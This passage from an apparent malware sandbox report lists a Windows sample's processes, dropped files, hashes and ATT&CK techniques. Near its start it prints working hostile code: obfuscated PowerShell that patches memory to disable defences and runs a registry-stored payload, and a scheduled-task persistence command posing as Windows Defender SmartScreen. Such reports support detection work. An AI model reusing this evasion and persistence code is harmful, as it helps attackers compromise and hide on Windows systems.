inter($xlKftmpEfPHQzbKPQ,$MchzwrzYYfQYWLzkLfoGEY).Invoke($NhXRftmawLxNQemBa,[uint32]8,4,[ref]$PIykjhaOpH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NhXRftmawLxNQemBa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xlKftmpEfPHQzbKPQ,$MchzwrzYYfQYWLzkLfoGEY).Invoke($NhXRftmawLxNQemBa,[uint32]8,0x20,[ref]$PIykjhaOpH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'FT'+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'l'+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5028

C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
"C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
PID:856

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c51bd4c8-cc04-4371-ae7b-618cdad5a45c}
1⤵
PID:2208

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Scripting

T1064

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
Filesize
3.6MB

MD5
4a513b169d499aa2681ba3661b21e898

SHA1
5c14642058153f57d8a9cbbed213d8fc1ac054b4

SHA256
9a3e26337589d76061479f7c984b79c478de429b78f24f5cd289189913c6d19d

SHA512
15883e270daf02b4f97448c593d64bf10aba48a45f0c4996e64f7450070ee96fa85bfd2b2a6402e3f683daaebf9bf3e88fcfe1354da7ccc0ed59184234258ebe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
62d949164e4aa1afcb2d32a39a5bdacb

SHA1
1f14472c79f45fa0083a20baf99eccd7faba7ec8

SHA256
41c65c603170c500dbd31c12b147a49aebf9d32ab2e71281e87882f4c6f3c0a4

SHA512
e519b3fb9851489ef3bf06077718b00a1bab152241214c54042fd92237323919703393f8524f1bc9824c46775c2cb5f0164e789f5ee2bab67d5195cbc0247557

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
a7ce8cefc3f798abe5abd683d0ef26dd

SHA1
b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

SHA256
5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

SHA512
c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6539a34c74920a5c656922258c336b5f

SHA1
36a74be3126b4aa0deef6e094d6199b8f5056645

SHA256
5427dfb4d22bef830b6f6b395b51489a791db48865572adfcb2f8c752293aae7

SHA512
bceb8b61e27e0b710d144005ea93419a8299c70d87188cd8a40253fac32f0a297008f333a1576fa357c5442a395429865a327db8471e048c19f0a0de3b712615

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
2.7MB

MD5
43a0526a928f9daca9c953221406af8e

SHA1
34fdd0d94ecfe8c887ebb164068579013d2c611b

SHA256
88e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986

SHA512
9632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
2.7MB

MD5
43a0526a928f9daca9c953221406af8e

SHA1
34fdd0d94ecfe8c887ebb164068579013d2c611b

SHA256
88e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986

SHA512
9632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
248KB

MD5
18ec6f65d276ea2173b26e7ca013190e

SHA1
f24d95a1069ccbde30ece236d72c7553689c890b

SHA256
5d5e9a03a29d4e638a175b889a5bb73fbcb0809ac83aa6966324fe86ac408d17

SHA512
33e2c237be627d032d9b1db91aa8446b06b9526f55dffc68c8eec55aedd6a747f2231dc1a4ab730590bb1a4407136b78ff6fa472643078b03dc665f781e31573

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
248KB

MD5
18ec6f65d276ea2173b26e7ca013190e

SHA1
f24d95a1069ccbde30ece236d72c7553689c890b

SHA256
5d5e9a03a29d4e638a175b889a5bb73fbcb0809ac83aa6966324fe86ac408d17

SHA512
33e2c237be627d032d9b1db91aa8446b06b9526f55dffc68c8eec55aedd6a747f2231dc1a4ab730590bb1a4407136b78ff6fa472643078b03dc665f781e31573

Download Submit
C:\Windows\System32\drivers\etc\hosts
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
aa187cac09f051e24146ad549a0f08a6

SHA1
2ef7fae3652bb838766627fa6584a6e3b5e74ff3

SHA256
7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

SHA512
960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

Download Submit
memory/220-170-0x0000000000000000-mapping.dmp

Download
memory/380-188-0x00007FFA06B90000-0x00007FFA07651000-memory.dmp

Filesize
10.8MB

Download
memory/380-181-0x000001DFBFEA0000-0x000001DFBFEC2000-memory.dmp

Filesize
136KB

Download
memory/380-183-0x00007FFA06B90000-0x00007FFA07651000-memory.dmp

Filesize
10.8MB

Download
memory/392-206-0x00007FF734CB1938-mapping.dmp

Download
memory/580-265-0x00007FF9E5890000-0x00007FF9E58A0000-memory.dmp

Filesize
64KB

Download
memory/856-245-0x000002D8EFA59000-0x000002D8EFA5F000-memory.dmp

Filesize
24KB

Download
memory/856-246-0x00007FFA06DB0000-0x00007FFA07871000-memory.dmp

Filesize
10.8MB

Download
memory/856-241-0x00007FFA06DB0000-0x00007FFA07871000-memory.dmp

Filesize
10.8MB

Download
memory/1236-191-0x0000000000000000-mapping.dmp

Download
memory/1388-236-0x0000000000000000-mapping.dmp

Download
memory/1416-203-0x00000000027B1000-0x00000000028EE000-memory.dmp

Filesize
1.2MB

Download
memory/1416-219-0x00000000022AB000-0x00000000027AF000-memory.dmp

Filesize
5.0MB

Download
memory/1416-189-0x00000000022AB000-0x00000000027AF000-memory.dmp

Filesize
5.0MB

Download
memory/1416-166-0x0000000000000000-mapping.dmp

Download
memory/1416-243-0x00000000027B1000-0x00000000028EE000-memory.dmp

Filesize
1.2MB

Download
memory/1424-180-0x0000000000220000-0x000000000025E000-memory.dmp

Filesize
248KB

Download
memory/1424-162-0x0000000000000000-mapping.dmp

Download
memory/1424-176-0x0000000000220000-0x000000000025E000-memory.dmp

Filesize
248KB

Download
memory/1676-231-0x0000000000000000-mapping.dmp

Download
memory/1908-209-0x0000000000000000-mapping.dmp

Download
memory/1936-196-0x0000000000000000-mapping.dmp

Download
memory/2208-250-0x0000000140002314-mapping.dmp

Download
memory/2208-249-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2208-258-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2208-262-0x00007FFA25810000-0x00007FFA25A05000-memory.dmp

Filesize
2.0MB

Download
memory/2208-263-0x00007FFA255D0000-0x00007FFA2568E000-memory.dmp

Filesize
760KB

Download
memory/2212-237-0x0000000000000000-mapping.dmp

Download
memory/2236-204-0x00007FFA06B90000-0x00007FFA07651000-memory.dmp

Filesize
10.8MB

Download
memory/2236-193-0x00007FFA06B90000-0x00007FFA07651000-memory.dmp

Filesize
10.8MB

Download
memory/2316-147-0x00000000064B0000-0x00000000064E2000-memory.dmp

Filesize
200KB

Download
memory/2316-141-0x0000000004930000-0x0000000004966000-memory.dmp

Filesize
216KB

Download
memory/2316-148-0x0000000074F00000-0x0000000074F4C000-memory.dmp

Filesize
304KB

Download
memory/2316-154-0x0000000007430000-0x000000000743E000-memory.dmp

Filesize
56KB

Download
memory/2316-156-0x0000000007470000-0x0000000007478000-memory.dmp

Filesize
32KB

Download
memory/2316-151-0x0000000007200000-0x000000000721A000-memory.dmp

Filesize
104KB

Download
memory/2316-150-0x0000000007840000-0x0000000007EBA000-memory.dmp

Filesize
6.5MB

Download
memory/2316-149-0x0000000006490000-0x00000000064AE000-memory.dmp

Filesize
120KB

Download
memory/2316-155-0x0000000007480000-0x000000000749A000-memory.dmp

Filesize
104KB

Download
memory/2316-152-0x0000000007270000-0x000000000727A000-memory.dmp

Filesize
40KB

Download
memory/2316-146-0x0000000005ED0000-0x0000000005EEE000-memory.dmp

Filesize
120KB

Download
memory/2316-157-0x0000000007590000-0x00000000075B2000-memory.dmp

Filesize
136KB

Download
memory/2316-145-0x0000000005850000-0x00000000058B6000-memory.dmp

Filesize
408KB

Download
memory/2316-144-0x00000000057E0000-0x0000000005846000-memory.dmp

Filesize
408KB

Download
memory/2316-143-0x0000000005050000-0x0000000005072000-memory.dmp

Filesize
136KB

Download
memory/2316-153-0x00000000074C0000-0x0000000007556000-memory.dmp

Filesize
600KB

Download
memory/2316-140-0x0000000000000000-mapping.dmp

Download
memory/2316-158-0x0000000008470000-0x0000000008A14000-memory.dmp

Filesize
5.6MB

Download
memory/2316-142-0x00000000050C0000-0x00000000056E8000-memory.dmp

Filesize
6.2MB

Download
memory/2332-213-0x0000000006910000-0x000000000692E000-memory.dmp

Filesize
120KB

Download
memory/2332-173-0x0000000000000000-mapping.dmp

Download
memory/2332-186-0x0000000005700000-0x000000000580A000-memory.dmp

Filesize
1.0MB

Download
memory/2332-187-0x0000000005630000-0x000000000566C000-memory.dmp

Filesize
240KB

Download
memory/2332-185-0x00000000055D0000-0x00000000055E2000-memory.dmp

Filesize
72KB

Download
memory/2332-227-0x00000000070D0000-0x0000000007120000-memory.dmp

Filesize
320KB

Download
memory/2332-210-0x00000000065E0000-0x0000000006656000-memory.dmp

Filesize
472KB

Download
memory/2332-174-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2332-221-0x00000000078C0000-0x0000000007DEC000-memory.dmp

Filesize
5.2MB

Download
memory/2332-220-0x00000000071C0000-0x0000000007382000-memory.dmp

Filesize
1.8MB

Download
memory/2332-184-0x0000000005B70000-0x0000000006188000-memory.dmp

Filesize
6.1MB

Download
memory/2424-238-0x0000000000000000-mapping.dmp

Download
memory/2448-230-0x0000000000000000-mapping.dmp

Download
memory/2788-257-0x0000000000000000-mapping.dmp

Download
memory/2900-192-0x0000000000000000-mapping.dmp

Download
memory/3320-232-0x0000000000000000-mapping.dmp

Download
memory/3344-199-0x0000000000000000-mapping.dmp

Download
memory/3664-256-0x00007FF7E7F514E0-mapping.dmp

Download
memory/3712-195-0x0000000000000000-mapping.dmp

Download
memory/3772-202-0x0000000000000000-mapping.dmp

Download
memory/4004-198-0x0000000000000000-mapping.dmp

Download
memory/4004-264-0x000001D45A860000-0x000001D45A880000-memory.dmp

Filesize
128KB

Download
memory/4004-261-0x00007FF78DA52720-mapping.dmp

Download
memory/4036-233-0x0000000000000000-mapping.dmp

Download
memory/4168-197-0x0000000000000000-mapping.dmp

Download
memory/4312-133-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4312-139-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4312-132-0x0000000000000000-mapping.dmp

Download
memory/4384-226-0x000002207E1C0000-0x000002207E1CA000-memory.dmp

Filesize
40KB

Download
memory/4384-222-0x000002207E170000-0x000002207E17A000-memory.dmp

Filesize
40KB

Download
memory/4384-216-0x000002207DF40000-0x000002207DF5C000-memory.dmp

Filesize
112KB

Download
memory/4384-217-0x000002207E020000-0x000002207E02A000-memory.dmp

Filesize
40KB

Download
memory/4384-228-0x00007FFA06DB0000-0x00007FFA07871000-memory.dmp

Filesize
10.8MB

Download
memory/4384-225-0x000002207E1B0000-0x000002207E1B6000-memory.dmp

Filesize
24KB

Download
memory/4384-224-0x000002207E180000-0x000002207E188000-memory.dmp

Filesize
32KB

Download
memory/4384-218-0x000002207E190000-0x000002207E1AC000-memory.dmp

Filesize
112KB

Download
memory/4384-223-0x000002207E1D0000-0x000002207E1EA000-memory.dmp

Filesize
104KB

Download
memory/4384-215-0x00007FFA06DB0000-0x00007FFA07871000-memory.dmp

Filesize
10.8MB

Download
memory/4536-201-0x0000000000000000-mapping.dmp

Download
memory/4556-171-0x00000000058E0000-0x00000000058EA000-memory.dmp

Filesize
40KB

Download
memory/4556-165-0x0000000005370000-0x0000000005402000-memory.dmp

Filesize
584KB

Download
memory/4556-164-0x0000000000850000-0x0000000000B04000-memory.dmp

Filesize
2.7MB

Download
memory/4556-159-0x0000000000000000-mapping.dmp

Download
memory/4584-240-0x0000000000000000-mapping.dmp

Download
memory/4972-235-0x0000000000000000-mapping.dmp

Download
memory/5028-244-0x00007FFA06DB0000-0x00007FFA07871000-memory.dmp

Filesize
10.8MB

Download
memory/5028-253-0x00007FFA06DB0000-0x00007FFA07871000-memory.dmp

Filesize
10.8MB

Download
memory/5028-214-0x00007FFA06DB0000-0x00007FFA07871000-memory.dmp

Filesize
10.8MB

Download
memory/5028-254-0x00007FFA25810000-0x00007FFA25A05000-memory.dmp

Filesize
2.0MB

Download
memory/5028-255-0x00007FFA255D0000-0x00007FFA2568E000-memory.dmp

Filesize
760KB

Download
memory/5028-247-0x00007FFA25810000-0x00007FFA25A05000-memory.dmp

Filesize
2.0MB

Download
memory/5028-248-0x00007FFA255D0000-0x00007FFA2568E000-memory.dmp

Filesize
760KB

Download
memory/5052-212-0x00007FFA06DB0000-0x00007FFA07871000-memory.dmp

Filesize
10.8MB

Download
memory/5052-207-0x00007FFA06DB0000-0x00007FFA07871000-memory.dmp

Filesize
10.8MB

Download
memory/5068-234-0x0000000000000000-mapping.dmp

Download
memory/5092-200-0x0000000000000000-mapping.dmp

Download